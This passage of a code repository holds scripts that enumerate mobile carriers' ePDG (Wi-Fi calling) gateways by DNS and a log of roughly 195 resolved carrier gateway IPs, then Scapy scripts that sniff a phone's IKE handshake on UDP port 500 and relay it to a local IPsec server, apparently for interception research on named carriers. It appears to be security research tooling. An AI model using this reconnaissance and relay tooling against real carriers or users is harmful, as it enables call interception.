22 | all_rows = soup.find_all('tbody')[0].find_all('tr')
23 | # Iterate over all MNC/MCC rows
24 | for i in range(0, len(all_rows)):
25 |
26 | # Get current mcc
27 | current_mcc = str(all_rows[i].find_all('td')[0].get_text()).zfill(3)
28 | # Get current mnc
29 | current_mnc = str(all_rows[i].find_all('td')[1].get_text()).zfill(3)
30 | # Generate the current URL based off the MNC and MCC
31 | current_url = "epdg.epc.mnc"+current_mnc+".mcc"+current_mcc+".pub.3gppnetwork.org"
32 | current_ip = ""
33 | try:
34 | # Find the current url
35 | current_ip = socket.gethostbyname(current_url)
36 | print(current_url + " - " + current_ip)
37 | except:
38 | # Generated when the DNS is not found
39 | print(current_url + " was not found.")
40 | # Get the text from each tag
41 | current_mcc_mnc = {
42 | "mcc": current_mcc,
43 | "mnc": current_mnc,
44 | "iso": all_rows[i].find_all('td')[2].get_text(),
45 | "country": all_rows[i].find_all('td')[3].get_text(),
46 | "country_code": all_rows[i].find_all('td')[4].get_text(),
47 | "network": all_rows[i].find_all('td')[5].get_text(),
48 | "epdg": current_url,
49 | "epdg_ip": current_ip
50 | }
51 | # Store it into the a python list
52 | all_mnc_mcc_data.append(current_mcc_mnc)
53 |
54 | # Store all of this into a JSON file.
55 | f = open("mcc_mnc_dump.json", "w")
56 | f.write(json.dumps(all_mnc_mcc_data))
57 | f.close()
58 |
59 | print("Done.")
--------------------------------------------------------------------------------
/epdg-discovery/search.py:
--------------------------------------------------------------------------------
1 | import json
2 | f = open("mcc_mnc_dump.json", "r")
3 | content = json.loads(f.read())
4 | count_total = len(content)
5 | count_null = 0
6 | count_valid = 0
7 | for i in range(0, count_total):
8 | if (content[i]["epdg_ip"] == ""):
9 | count_null = count_null + 1
10 | else:
11 | print(content[i]["country"] + " - " + content[i]["network"] + " - " + content[i]["epdg"] + " - " + content[i]["epdg_ip"])
12 | count_valid = count_valid + 1
13 |
14 | print str(count_valid) + " valid, ", str(count_null) + " invalid, ", str(count_total) + " total"
--------------------------------------------------------------------------------
/epdg-discovery/search_log.txt:
--------------------------------------------------------------------------------
1 | Albania - Vodafone - epdg.epc.mnc002.mcc276.pub.3gppnetwork.org - 79.171.50.212
2 | Argentina Republic - Claro/ CTI/AMX - epdg.epc.mnc310.mcc722.pub.3gppnetwork.org - 131.100.108.121
3 | Argentina Republic - Telecom Personal S.A. - epdg.epc.mnc341.mcc722.pub.3gppnetwork.org - 181.10.205.25
4 | Armenia - Orange - epdg.epc.mnc010.mcc283.pub.3gppnetwork.org - 185.59.68.5
5 | Armenia - Vivacell - epdg.epc.mnc005.mcc283.pub.3gppnetwork.org - 217.76.2.170
6 | Australia - AAPT Ltd. - epdg.epc.mnc014.mcc505.pub.3gppnetwork.org - 210.10.57.129
7 | Australia - H3G Ltd. - epdg.epc.mnc006.mcc505.pub.3gppnetwork.org - 101.119.31.66
8 | Australia - Singtel Optus - epdg.epc.mnc002.mcc505.pub.3gppnetwork.org - 210.49.47.194
9 | Australia - Telstra Corp. Ltd. - epdg.epc.mnc071.mcc505.pub.3gppnetwork.org - 144.135.83.107
10 | Australia - Telstra Corp. Ltd. - epdg.epc.mnc072.mcc505.pub.3gppnetwork.org - 149.135.136.48
11 | Australia - Telstra Corp. Ltd. - epdg.epc.mnc001.mcc505.pub.3gppnetwork.org - 149.135.226.9
12 | Australia - Vodafone - epdg.epc.mnc003.mcc505.pub.3gppnetwork.org - 101.119.216.1
13 | Austria - A1 MobilKom - epdg.epc.mnc001.mcc232.pub.3gppnetwork.org - 188.21.252.120
14 | Austria - H3G - epdg.epc.mnc010.mcc232.pub.3gppnetwork.org - 213.94.78.30
15 | Austria - H3G - epdg.epc.mnc014.mcc232.pub.3gppnetwork.org - 194.24.130.74
16 | Austria - 3/Orange/One Connect - epdg.epc.mnc005.mcc232.pub.3gppnetwork.org - 213.94.78.28
17 | Austria - T-Mobile/Telering - epdg.epc.mnc003.mcc232.pub.3gppnetwork.org - 213.162.90.41
18 | Austria - T-Mobile/Telering - epdg.epc.mnc007.mcc232.pub.3gppnetwork.org - 213.162.90.41
19 | Bahrain - Batelco - epdg.epc.mnc001.mcc426.pub.3gppnetwork.org - 88.201.70.1
20 | Belarus - Mobile Digital Communications - epdg.epc.mnc001.mcc257.pub.3gppnetwork.org - 128.140.255.91
21 | Belgium - Belgacom/Proximus - epdg.epc.mnc001.mcc206.pub.3gppnetwork.org - 81.169.63.80
22 | Belgium - Mobistar/Orange - epdg.epc.mnc010.mcc206.pub.3gppnetwork.org - 212.224.253.170
23 | Brazil - Claro/Albra/America Movil - epdg.epc.mnc005.mcc724.pub.3gppnetwork.org - 200.169.116.53
24 | Brazil - PORTO SEGURO TELECOMUNICACOES - epdg.epc.mnc054.mcc724.pub.3gppnetwork.org - 138.0.220.25
25 | Brazil - Vivo S.A./Telemig - epdg.epc.mnc023.mcc724.pub.3gppnetwork.org - 200.220.254.168
26 | Brazil - Vivo S.A./Telemig - epdg.epc.mnc011.mcc724.pub.3gppnetwork.org - 200.220.254.168
27 | Brazil - Vivo S.A./Telemig - epdg.epc.mnc010.mcc724.pub.3gppnetwork.org - 200.142.134.80
28 | Brazil - Vivo S.A./Telemig - epdg.epc.mnc006.mcc724.pub.3gppnetwork.org - 200.142.134.80
29 | Bulgaria - BTC Mobile EOOD (vivatel) - epdg.epc.mnc003.mcc284.pub.3gppnetwork.org - 82.137.72.94
30 | Cambodia - Smart Mobile - epdg.epc.mnc006.mcc456.pub.3gppnetwork.org - 27.109.115.234
31 | Canada - Bell Mobility - epdg.epc.mnc610.mcc302.pub.3gppnetwork.org - 174.90.221.3
32 | Canada - Latitude Wireless - epdg.epc.mnc640.mcc302.pub.3gppnetwork.org - 209.226.31.198
33 | Canada - FIDO (Rogers AT&T/ Microcell) - epdg.epc.mnc370.mcc302.pub.3gppnetwork.org - 209.148.157.48
34 | Canada - Rogers AT&T Wireless - epdg.epc.mnc720.mcc302.pub.3gppnetwork.org - 209.148.157.48
35 | Canada - Telus Mobility - epdg.epc.mnc220.mcc302.pub.3gppnetwork.org - 207.34.240.206
36 | Canada - Videotron - epdg.epc.mnc500.mcc302.pub.3gppnetwork.org - 184.162.85.128
37 | Canada - WIND - epdg.epc.mnc490.mcc302.pub.3gppnetwork.org - 74.115.199.33
38 | Chile - Claro - epdg.epc.mnc003.mcc730.pub.3gppnetwork.org - 190.208.28.209
39 | Chile - Entel Telefonia Mov - epdg.epc.mnc001.mcc730.pub.3gppnetwork.org - 186.10.61.18
40 | Chile - Nextel SA - epdg.epc.mnc009.mcc730.pub.3gppnetwork.org - 168.196.202.1
41 | Chile - TELEFONICA - epdg.epc.mnc002.mcc730.pub.3gppnetwork.org - 191.125.99.97
42 | Colombia - Movistar - epdg.epc.mnc123.mcc732.pub.3gppnetwork.org - 190.13.98.250
43 | Croatia - T-Mobile/Cronet - epdg.epc.mnc001.mcc219.pub.3gppnetwork.org - 195.29.253.232
44 | Czech Rep. - O2 - epdg.epc.mnc002.mcc230.pub.3gppnetwork.org - 160.218.3.2
45 | Czech Rep. - T-Mobile / RadioMobil - epdg.epc.mnc001.mcc230.pub.3gppnetwork.org - 62.141.11.101
46 | Czech Rep. - Vodafone - epdg.epc.mnc003.mcc230.pub.3gppnetwork.org - 31.30.69.153
47 | Denmark - H3G - epdg.epc.mnc006.mcc238.pub.3gppnetwork.org - 95.209.200.94
48 | Denmark - TDC Denmark - epdg.epc.mnc010.mcc238.pub.3gppnetwork.org - 195.41.220.252
49 | Denmark - TDC Denmark - epdg.epc.mnc001.mcc238.pub.3gppnetwork.org - 195.41.220.240
50 | Denmark - Telenor/Sonofon - epdg.epc.mnc002.mcc238.pub.3gppnetwork.org - 77.214.4.170
51 | Denmark - Telia - epdg.epc.mnc020.mcc238.pub.3gppnetwork.org - 62.44.172.134
52 | Dominican Republic - Claro - epdg.epc.mnc002.mcc370.pub.3gppnetwork.org - 190.166.58.133
53 | Dominican Republic - Orange - epdg.epc.mnc001.mcc370.pub.3gppnetwork.org - 190.124.94.1
54 | Ecuador - Claro/Porta - epdg.epc.mnc001.mcc740.pub.3gppnetwork.org - 200.25.222.130
55 | Egypt - ETISALAT - epdg.epc.mnc003.mcc602.pub.3gppnetwork.org - 105.203.255.75
56 | Estonia - EMT GSM - epdg.epc.mnc001.mcc248.pub.3gppnetwork.org - 195.50.247.182
57 | Estonia - Radiolinja Eesti - epdg.epc.mnc002.mcc248.pub.3gppnetwork.org - 194.204.13.254
58 | Faroe Islands - Faroese Telecom - epdg.epc.mnc001.mcc288.pub.3gppnetwork.org - 81.18.225.12
59 | Finland - DNA/Finnet - epdg.epc.mnc012.mcc244.pub.3gppnetwork.org - 213.216.202.72
60 | Finland - DNA/Finnet - epdg.epc.mnc013.mcc244.pub.3gppnetwork.org - 213.216.202.75
61 | Finland - Elisa/Saunalahti - epdg.epc.mnc021.mcc244.pub.3gppnetwork.org - 213.161.47.201
62 | Finland - Elisa/Saunalahti - epdg.epc.mnc005.mcc244.pub.3gppnetwork.org - 213.161.47.18
63 | Finland - TeliaSonera - epdg.epc.mnc091.mcc244.pub.3gppnetwork.org - 194.142.89.198
64 | France - Bouygues Telecom - epdg.epc.mnc020.mcc208.pub.3gppnetwork.org - 62.201.149.81
65 | France - NRJ - epdg.epc.mnc026.mcc208.pub.3gppnetwork.org - 193.56.244.208
66 | France - Orange - epdg.epc.mnc001.mcc208.pub.3gppnetwork.org - 80.12.36.249
67 | France - S.F.R. - epdg.epc.mnc010.mcc208.pub.3gppnetwork.org - 92.90.28.1
68 | Germany - E-Plus - epdg.epc.mnc003.mcc262.pub.3gppnetwork.org - 89.15.232.32
69 | Germany - O2 - epdg.epc.mnc007.mcc262.pub.3gppnetwork.org - 89.15.232.32
70 | Germany - T-mobile/Telekom - epdg.epc.mnc001.mcc262.pub.3gppnetwork.org - 109.237.187.130
71 | Germany - Vodafone D2 - epdg.epc.mnc009.mcc262.pub.3gppnetwork.org - 139.7.2.205
72 | Ghana - MTN - epdg.epc.mnc001.mcc620.pub.3gppnetwork.org - 41.189.161.185
73 | Greece - Cosmote - epdg.epc.mnc001.mcc202.pub.3gppnetwork.org - 94.143.176.220
74 | Greece - Vodafone - epdg.epc.mnc005.mcc202.pub.3gppnetwork.org - 62.74.30.36
75 | Hongkong, China - China Mobile/Peoples - epdg.epc.mnc012.mcc454.pub.3gppnetwork.org - 182.239.118.1
76 | Hongkong, China - CSL Ltd. - epdg.epc.mnc000.mcc454.pub.3gppnetwork.org - 120.88.254.1
77 | Hongkong, China - CSL/New World PCS Ltd. - epdg.epc.mnc010.mcc454.pub.3gppnetwork.org - 120.88.224.2
78 | Hongkong, China - HKT/PCCW - epdg.epc.mnc019.mcc454.pub.3gppnetwork.org - 120.88.224.1
79 | Hongkong, China - HKT/PCCW - epdg.epc.mnc016.mcc454.pub.3gppnetwork.org - 120.88.254.2
80 | Hongkong, China - Vodafone/SmarTone - epdg.epc.mnc006.mcc454.pub.3gppnetwork.org - 180.219.134.17
81 | Hungary - T-mobile/Magyar - epdg.epc.mnc030.mcc216.pub.3gppnetwork.org - 212.51.127.131
82 | India - AirTel - epdg.epc.mnc053.mcc405.pub.3gppnetwork.org - 125.17.2.189
83 | India - Bharti Airtel Limited (Delhi) - epdg.epc.mnc010.mcc404.pub.3gppnetwork.org - 223.224.79.240
84 | India - Bharti Airtel Limited (Karnataka) (India) - epdg.epc.mnc045.mcc404.pub.3gppnetwork.org - 106.200.64.1
85 | India - Hexacom India - epdg.epc.mnc070.mcc404.pub.3gppnetwork.org - 223.224.150.16
86 | India - Hexcom India - epdg.epc.mnc016.mcc404.pub.3gppnetwork.org - 223.224.79.240
87 | Indonesia - PT Smartfren Telecom Tbk - epdg.epc.mnc009.mcc510.pub.3gppnetwork.org - 115.178.173.5
88 | Indonesia - PT Smartfren Telecom Tbk - epdg.epc.mnc028.mcc510.pub.3gppnetwork.org - 115.178.173.5
89 | Ireland - Meteor Mobile Ltd. - epdg.epc.mnc003.mcc272.pub.3gppnetwork.org - 86.43.56.36
90 | Ireland - Vodafone Eircell - epdg.epc.mnc001.mcc272.pub.3gppnetwork.org - 89.19.64.93
91 | Israel - Cellcom ltd. - epdg.epc.mnc002.mcc425.pub.3gppnetwork.org - 176.12.160.1
92 | Israel - Hot Mobile/Mirs - epdg.epc.mnc007.mcc425.pub.3gppnetwork.org - 80.246.131.244
93 | Israel - Orange/Partner Co. Ltd. - epdg.epc.mnc001.mcc425.pub.3gppnetwork.org - 82.102.137.8
94 | Israel - Pelephone - epdg.epc.mnc003.mcc425.pub.3gppnetwork.org - 91.135.104.90
95 | Japan - KDDI Corporation - epdg.epc.mnc050.mcc440.pub.3gppnetwork.org - 27.86.78.32
96 | Japan - KDDI Corporation - epdg.epc.mnc051.mcc440.pub.3gppnetwork.org - 27.86.78.32
97 | Jordan - ZAIN /J.M.T.S - epdg.epc.mnc001.mcc416.pub.3gppnetwork.org - 94.142.37.56
98 | Kuwait - Viva - epdg.epc.mnc004.mcc419.pub.3gppnetwork.org - 94.129.128.170
99 | Kuwait - Zain - epdg.epc.mnc002.mcc419.pub.3gppnetwork.org - 95.66.17.49
100 | Luxembourg - Millicom Tango GSM - epdg.epc.mnc077.mcc270.pub.3gppnetwork.org - 212.66.71.12
101 | Luxembourg - P+T/Post LUXGSM - epdg.epc.mnc001.mcc270.pub.3gppnetwork.org - 78.141.178.58
102 | Luxembourg - Orange/VOXmobile S.A. - epdg.epc.mnc099.mcc270.pub.3gppnetwork.org - 212.224.253.168
103 | Malaysia - Digi Telecommunications - epdg.epc.mnc016.mcc502.pub.3gppnetwork.org - 115.164.17.24
104 | Malaysia - MTX Utara - epdg.epc.mnc011.mcc502.pub.3gppnetwork.org - 42.153.28.64
105 | Malaysia - Webe/Packet One Networks (Malaysia) Sdn Bhd - epdg.epc.mnc153.mcc502.pub.3gppnetwork.org - 42.153.28.64
106 | Malaysia - U Mobile - epdg.epc.mnc018.mcc502.pub.3gppnetwork.org - 123.136.100.128
107 | Maldives - Ooredo/Wataniya - epdg.epc.mnc002.mcc472.pub.3gppnetwork.org - 103.50.104.145
108 | Namibia - MTC - epdg.epc.mnc001.mcc649.pub.3gppnetwork.org - 41.219.127.84
109 | Netherlands - KPN Telecom B.V. - epdg.epc.mnc069.mcc204.pub.3gppnetwork.org - 62.133.126.254
110 | Netherlands - KPN Telecom B.V. - epdg.epc.mnc008.mcc204.pub.3gppnetwork.org - 62.133.76.240
111 | Netherlands - T-Mobile B.V. - epdg.epc.mnc016.mcc204.pub.3gppnetwork.org - 84.241.236.219
112 | Netherlands - T-mobile/former Orange - epdg.epc.mnc020.mcc204.pub.3gppnetwork.org - 84.241.236.219
113 | Netherlands - Tele2 - epdg.epc.mnc002.mcc204.pub.3gppnetwork.org - 84.241.236.198
114 | Netherlands - Vodafone Libertel - epdg.epc.mnc004.mcc204.pub.3gppnetwork.org - 109.39.144.148
115 | Norway - ICE Nordisk Mobiltelefon AS - epdg.epc.mnc014.mcc242.pub.3gppnetwork.org - 217.13.9.76
116 | Norway - Netcom - epdg.epc.mnc002.mcc242.pub.3gppnetwork.org - 89.9.88.41
117 | Norway - Network Norway AS - epdg.epc.mnc005.mcc242.pub.3gppnetwork.org - 89.9.88.41
118 | Norway - TDC Mobil A/S - epdg.epc.mnc008.mcc242.pub.3gppnetwork.org - 195.41.220.241
119 | Norway - Telenor - epdg.epc.mnc001.mcc242.pub.3gppnetwork.org - 77.16.1.126
120 | Oman - Oman Mobile/GTO - epdg.epc.mnc002.mcc422.pub.3gppnetwork.org - 212.72.1.25
121 | Panama - Cable & W./Mas Movil - epdg.epc.mnc001.mcc714.pub.3gppnetwork.org - 201.227.226.190
122 | Peru - Movistar - epdg.epc.mnc006.mcc716.pub.3gppnetwork.org - 201.230.206.157
123 | Peru - Nextel - epdg.epc.mnc017.mcc716.pub.3gppnetwork.org - 186.163.2.194
124 | Philippines - Smart - epdg.epc.mnc003.mcc515.pub.3gppnetwork.org - 121.54.55.133
125 | Poland - Orange/IDEA/Centertel - epdg.epc.mnc003.mcc260.pub.3gppnetwork.org - 217.116.100.15
126 | Poland - Play/P4 - epdg.epc.mnc098.mcc260.pub.3gppnetwork.org - 89.108.195.110
127 | Poland - Play/P4 - epdg.epc.mnc006.mcc260.pub.3gppnetwork.org - 89.108.200.112
128 | Poland - Polkomtel/Plus - epdg.epc.mnc001.mcc260.pub.3gppnetwork.org - 37.248.184.80
129 | Poland - T-Mobile/ERA - epdg.epc.mnc002.mcc260.pub.3gppnetwork.org - 83.220.97.255
130 | Portugal - NOS/Optimus - epdg.epc.mnc003.mcc268.pub.3gppnetwork.org - 212.113.164.233
131 | Puerto Rico - Puerto Rico Telephone Company Inc. (PRTC) - epdg.epc.mnc110.mcc330.pub.3gppnetwork.org - 72.50.33.21
132 | Qatar - Vodafone - epdg.epc.mnc002.mcc427.pub.3gppnetwork.org - 80.76.164.146
133 | Romania - Orange - epdg.epc.mnc010.mcc226.pub.3gppnetwork.org - 109.166.155.232
134 | Romania - RCS&RDS Digi Mobile - epdg.epc.mnc005.mcc226.pub.3gppnetwork.org - 82.137.11.252
135 | Romania - Vodafone - epdg.epc.mnc001.mcc226.pub.3gppnetwork.org - 46.97.10.152
136 | Russian Federation - Megafon - epdg.epc.mnc002.mcc250.pub.3gppnetwork.org - 31.173.34.209
137 | Russian Federation - MTS - epdg.epc.mnc001.mcc250.pub.3gppnetwork.org - 213.87.143.150
138 | Russian Federation - BeeLine/VimpelCom - epdg.epc.mnc099.mcc250.pub.3gppnetwork.org - 109.197.204.240
139 | Saudi Arabia - Etihad/Etisalat/Mobily - epdg.epc.mnc003.mcc420.pub.3gppnetwork.org - 86.51.51.55
140 | Saudi Arabia - STC/Al Jawal - epdg.epc.mnc001.mcc420.pub.3gppnetwork.org - 212.215.132.243
141 | Saudi Arabia - Zain - epdg.epc.mnc004.mcc420.pub.3gppnetwork.org - 79.170.53.23
142 | Singapore - Singtel - epdg.epc.mnc001.mcc525.pub.3gppnetwork.org - 111.65.101.17
143 | Singapore - Starhub - epdg.epc.mnc005.mcc525.pub.3gppnetwork.org - 203.116.25.1
144 | Slovakia - Orange - epdg.epc.mnc001.mcc231.pub.3gppnetwork.org - 213.151.204.237
145 | Slovenia - Mobitel - epdg.epc.mnc041.mcc293.pub.3gppnetwork.org - 213.229.192.67
146 | South Africa - 8.ta - epdg.epc.mnc002.mcc655.pub.3gppnetwork.org - 41.147.159.254
147 | South Africa - Cell C - epdg.epc.mnc007.mcc655.pub.3gppnetwork.org - 41.50.128.53
148 | South Africa - MTN - epdg.epc.mnc010.mcc655.pub.3gppnetwork.org - 41.208.50.113
149 | South Africa - Vodacom - epdg.epc.mnc001.mcc655.pub.3gppnetwork.org - 41.1.162.233
150 | Spain - Movistar - epdg.epc.mnc007.mcc214.pub.3gppnetwork.org - 213.4.100.145
151 | Spain - Movistar - epdg.epc.mnc005.mcc214.pub.3gppnetwork.org - 213.4.100.145
152 | Spain - Orange - epdg.epc.mnc003.mcc214.pub.3gppnetwork.org - 92.58.249.252
153 | Sri Lanka - MTN/Dialog - epdg.epc.mnc002.mcc413.pub.3gppnetwork.org - 122.255.0.80
154 | Sudan - ZAIN/Mobitel - epdg.epc.mnc001.mcc634.pub.3gppnetwork.org - 41.95.254.50
155 | Sweden - H3G Access AB - epdg.epc.mnc002.mcc240.pub.3gppnetwork.org - 80.251.192.4
156 | Sweden - Tele2 Sverige AB - epdg.epc.mnc007.mcc240.pub.3gppnetwork.org - 90.132.128.59
157 | Sweden - Telenor (Vodafone) - epdg.epc.mnc008.mcc240.pub.3gppnetwork.org - 82.183.102.4
158 | Sweden - Telenor (Vodafone) - epdg.epc.mnc006.mcc240.pub.3gppnetwork.org - 18.200.61.111
159 | Sweden - Telia Mobile - epdg.epc.mnc001.mcc240.pub.3gppnetwork.org - 217.214.144.73
160 | Switzerland - Salt/Orange - epdg.epc.mnc003.mcc228.pub.3gppnetwork.org - 213.55.207.51
161 | Switzerland - Swisscom - epdg.epc.mnc001.mcc228.pub.3gppnetwork.org - 138.188.106.228
162 | Switzerland - TDC Sunrise - epdg.epc.mnc002.mcc228.pub.3gppnetwork.org - 194.230.155.9
163 | Taiwan - Chunghwa Telecom LDM - epdg.epc.mnc092.mcc466.pub.3gppnetwork.org - 221.120.23.1
164 | Taiwan - Far EasTone - epdg.epc.mnc001.mcc466.pub.3gppnetwork.org - 211.77.241.91
165 | Taiwan - Taiwan Cellular - epdg.epc.mnc097.mcc466.pub.3gppnetwork.org - 175.96.62.1
166 | Thailand - Advanced Wireless Networks/AWN - epdg.epc.mnc003.mcc520.pub.3gppnetwork.org - 119.31.123.26
167 | Thailand - Total Access (DTAC) - epdg.epc.mnc005.mcc520.pub.3gppnetwork.org - 111.84.240.252
168 | Thailand - True Move/Orange - epdg.epc.mnc004.mcc520.pub.3gppnetwork.org - 61.91.170.102
169 | Turkey - AVEA/Aria - epdg.epc.mnc003.mcc286.pub.3gppnetwork.org - 188.41.241.41
170 | Turkey - Turkcell - epdg.epc.mnc001.mcc286.pub.3gppnetwork.org - 188.59.209.1
171 | Turkey - Vodafone-Telsim - epdg.epc.mnc002.mcc286.pub.3gppnetwork.org - 217.31.250.158
172 | Ukraine - Astelit/LIFE - epdg.epc.mnc006.mcc255.pub.3gppnetwork.org - 212.58.160.223
173 | United Kingdom - H3G Hutchinson - epdg.epc.mnc020.mcc234.pub.3gppnetwork.org - 188.31.254.71
174 | United Kingdom - O2 Ltd. - epdg.epc.mnc010.mcc234.pub.3gppnetwork.org - 87.194.88.8
175 | United Kingdom - OnePhone - epdg.epc.mnc008.mcc234.pub.3gppnetwork.org - 81.128.196.38
176 | United Kingdom - Everyth. Ev.wh./Orange - epdg.epc.mnc033.mcc234.pub.3gppnetwork.org - 109.249.190.48
177 | United Kingdom - Sky UK Limited - epdg.epc.mnc057.mcc234.pub.3gppnetwork.org - 185.110.178.136
178 | United Kingdom - Everyth. Ev.wh./T-Mobile - epdg.epc.mnc030.mcc234.pub.3gppnetwork.org - 109.249.186.72
179 | United Kingdom - Vodafone - epdg.epc.mnc015.mcc234.pub.3gppnetwork.org - 88.82.11.208
180 | United States - Cellular Network Partnership LLC - epdg.epc.mnc280.mcc312.pub.3gppnetwork.org - 216.176.175.212
181 | United States - GCI Communication Corp. - epdg.epc.mnc370.mcc311.pub.3gppnetwork.org - 65.74.4.8
182 | United States - North Carolina RSA 3 Cellular Tel. Co. - epdg.epc.mnc130.mcc310.pub.3gppnetwork.org - 162.247.206.24
183 | United States - Northeast Colorado Cellular Inc. - epdg.epc.mnc450.mcc310.pub.3gppnetwork.org - 199.47.64.52
184 | United States - Sprint Spectrum - epdg.epc.mnc530.mcc312.pub.3gppnetwork.org - 68.31.58.7
185 | United States - Sprint Spectrum - epdg.epc.mnc120.mcc310.pub.3gppnetwork.org - 68.31.42.7
186 | United States - T-Mobile - epdg.epc.mnc260.mcc310.pub.3gppnetwork.org - 208.54.37.80
187 | United States - T-Mobile - epdg.epc.mnc240.mcc310.pub.3gppnetwork.org - 208.54.83.96
188 | United States - T-Mobile - epdg.epc.mnc300.mcc310.pub.3gppnetwork.org - 66.94.5.1
189 | United States - T-Mobile - epdg.epc.mnc310.mcc310.pub.3gppnetwork.org - 66.94.5.2
190 | United States - United Wireless Communications Inc. - epdg.epc.mnc650.mcc311.pub.3gppnetwork.org - 209.203.168.77
191 | Uruguay - Claro/AM Wireless - epdg.epc.mnc010.mcc748.pub.3gppnetwork.org - 131.100.108.126
192 | Uruguay - MOVISTAR - epdg.epc.mnc007.mcc748.pub.3gppnetwork.org - 186.8.59.128
193 | Viet Nam - VietnaMobile - epdg.epc.mnc005.mcc452.pub.3gppnetwork.org - 203.170.27.10
194 | Viet Nam - Viettel Mobile - epdg.epc.mnc004.mcc452.pub.3gppnetwork.org - 27.68.226.241
195 | Viet Nam - Vinaphone - epdg.epc.mnc002.mcc452.pub.3gppnetwork.org - 113.185.27.24
196 | 195 valid, 1495 invalid, 1690 total
197 |
--------------------------------------------------------------------------------
/et1_at.py:
--------------------------------------------------------------------------------
1 | #!/usr/local/bin/python
2 | from scapy.all import *
3 | ipsec_server = "192.168.84.128"
4 |
5 | ##### Phase 1 #####
6 |
7 | # capturing TWO 1st pk from UE and ePDG
8 | #packet1=sniff(iface="eth0", filter="udp and port 500", count=2, prn=lambda x: x.summary)
9 |
10 | packet1=sniff(iface="eth0", filter="udp and port 500", count=2)
11 |
12 |
13 | # forwarding 1st request pk from ue to swan server
14 | data1 = ""
15 | tlayer =packet1[0].getlayer(UDP)
16 | if packet1[0].getlayer(Raw):
17 | #if packet1[0].getlayer(ISAKMP):
18 | data1 += str(tlayer.payload)
19 | wrpcap("data1.pcap", packet1[0]) # overall packet
20 | f = open("raw_data1.dat", 'w')
21 | f.write(data1)
22 | f.close()
23 |
24 | # storing 2nd response pk from ePDG
25 | data2 = ""
26 | tlayer =packet1[1].getlayer(UDP)
27 | if packet1[1].getlayer(Raw):
28 | #if packet1[1].getlayer(ISAKMP):
29 | data2 += str(tlayer.payload) #assemble the packet
30 |
31 | wrpcap("data2.pcap", packet1[1]) # overall packet
32 | #wireshark(packet1[1])
33 | f = open("raw_data2.dat", 'w') # payload only
34 | f.write(data2)
35 | f.close()
36 |
37 | send(IP(dst=ipsec_server)/UDP()/ISAKMP(data1))
38 |
39 |
40 |
41 |
42 |
43 |
--------------------------------------------------------------------------------
/et1_sprinter.py:
--------------------------------------------------------------------------------
1 | #!/usr/local/bin/python
2 | from scapy.all import *
3 | ipsec_server = "192.168.84.128"
4 |
5 | ##### Phase 1 #####
6 |
7 | # capturing TWO 1st pk from UE and ePDG
8 | #packet1=sniff(iface="eth0", filter="udp and port 500", count=2, prn=lambda x: x.summary)
9 |
10 | packet1=sniff(iface="eth0", filter="udp and port 500", count=2)
11 |
12 |
13 | # forwarding 1st request pk from ue to swan server
14 | data1 = ""
15 | tlayer =packet1[0].getlayer(UDP)
16 | #if packet1[0].getlayer(Raw):
17 | if packet1[0].getlayer(ISAKMP):
18 | data1 += str(tlayer.payload)
19 | wrpcap("data1.pcap", packet1[0]) # overall packet
20 | f = open("raw_data1.dat", 'w')
21 | f.write(data1)
22 | f.close()
23 |
24 | # storing 2nd response pk from ePDG
25 | data2 = ""
26 | tlayer =packet1[1].getlayer(UDP)
27 | #if packet1[1].getlayer(Raw):
28 | if packet1[1].getlayer(ISAKMP):
29 | data2 += str(tlayer.payload) #assemble the packet
30 |
31 | wrpcap("data2.pcap", packet1[1]) # overall packet
32 | #wireshark(packet1[1])
33 | f = open("raw_data2.dat", 'w') # payload only
34 | f.write(data2)
35 | f.close()
36 |
37 | send(IP(dst=ipsec_server)/UDP()/ISAKMP(data1))
38 |
39 |
40 |
41 |
42 |
43 |
--------------------------------------------------------------------------------
/et1_tmobile.py:
--------------------------------------------------------------------------------
1 | #!/usr/local/bin/python
2 | from scapy.all import *
3 | ipsec_server = "192.168.56.102"
4 | #ipsec_server = "10.0.2.15"
5 |
6 | ##### Phase 1 #####
7 |
8 | # capturing TWO 1st pk from UE and ePDG
9 | #packet1=sniff(iface="eth0", filter="udp and port 500", count=2, prn=lambda x: x.summary)
10 |
11 | packet1=sniff(iface="eth0", filter="udp and port 500", count=2)
12 |
13 |
14 | # forwarding 1st request pk from ue to swan server
15 | data1 = ""
16 | tlayer =packet1[0].getlayer(UDP)
17 | if packet1[0].getlayer(Raw):
18 | #if packet1[0].getlayer(ISAKMP):
19 | data1 += str(tlayer.payload)
20 | wrpcap("data1.pcap", packet1[0]) # overall packet
21 | f = open("raw_data1.dat", 'w')
22 | f.write(data1)
23 | f.close()
24 |
25 | # storing 2nd response pk from ePDG
26 | data2 = ""
27 | tlayer =packet1[1].getlayer(UDP)
28 | if packet1[1].getlayer(Raw):
29 | #if packet1[1].getlayer(ISAKMP):
30 | data2 += str(tlayer.payload) #assemble the packet
31 |
32 | wrpcap("data2.pcap", packet1[1]) # overall packet
33 | #wireshark(packet1[1])
34 | f = open("raw_data2.dat", 'w') # payload only
35 | f.write(data2)
36 | f.close()
37 |
38 | send(IP(dst=ipsec_server)/UDP()/ISAKMP(data1))
39 |
40 |
41 |
42 |
43 |
44 |
--------------------------------------------------------------------------------
/et1_verizon.py:
--------------------------------------------------------------------------------
1 | #!/usr/local/bin/python
2 | from scapy.all import *
3 | ipsec_server = "192.168.56.102"
4 | #ipsec_server = "192.168.84.128"
5 |
6 | ##### Phase 1 #####
7 |
8 | # capturing TWO 1st pk from UE and ePDG
9 | #packet1=sniff(iface="eth0", filter="udp and port 500", count=2, prn=lambda x: x.summary)
10 |
11 | packet1=sniff(iface="eth0", filter="udp and port 500", count=2)
12 |
13 |
14 | # forwarding 1st request pk from ue to swan server
15 | data1 = ""
16 | tlayer =packet1[0].getlayer(UDP)
17 | #if packet1[0].getlayer(Raw):
18 | if packet1[0].getlayer(ISAKMP):
19 | data1 += str(tlayer.payload)
20 | wrpcap("data1.pcap", packet1[0]) # overall packet
21 | f = open("raw_data1.dat", 'w')
22 | f.write(data1)
23 | f.close()
24 |
25 | # storing 2nd response pk from ePDG
26 | data2 = ""
27 | tlayer =packet1[1].getlayer(UDP)
28 | #if packet1[1].getlayer(Raw):
29 | if packet1[1].getlayer(ISAKMP):
30 | data2 += str(tlayer.payload) #assemble the packet
31 |
32 | wrpcap("data2.pcap", packet1[1]) # overall packet
33 | #wireshark(packet1[1])
34 | f = open("raw_data2.dat", 'w') # payload only
35 | f.write(data2)
36 | f.close()
37 |
38 | send(IP(dst=ipsec_server)/UDP()/ISAKMP(data1))
39 |
40 |
41 |
42 |
43 |
44 |
--------------------------------------------------------------------------------
/et2_at.py:
--------------------------------------------------------------------------------
1 | #!/usr/local/bin/python
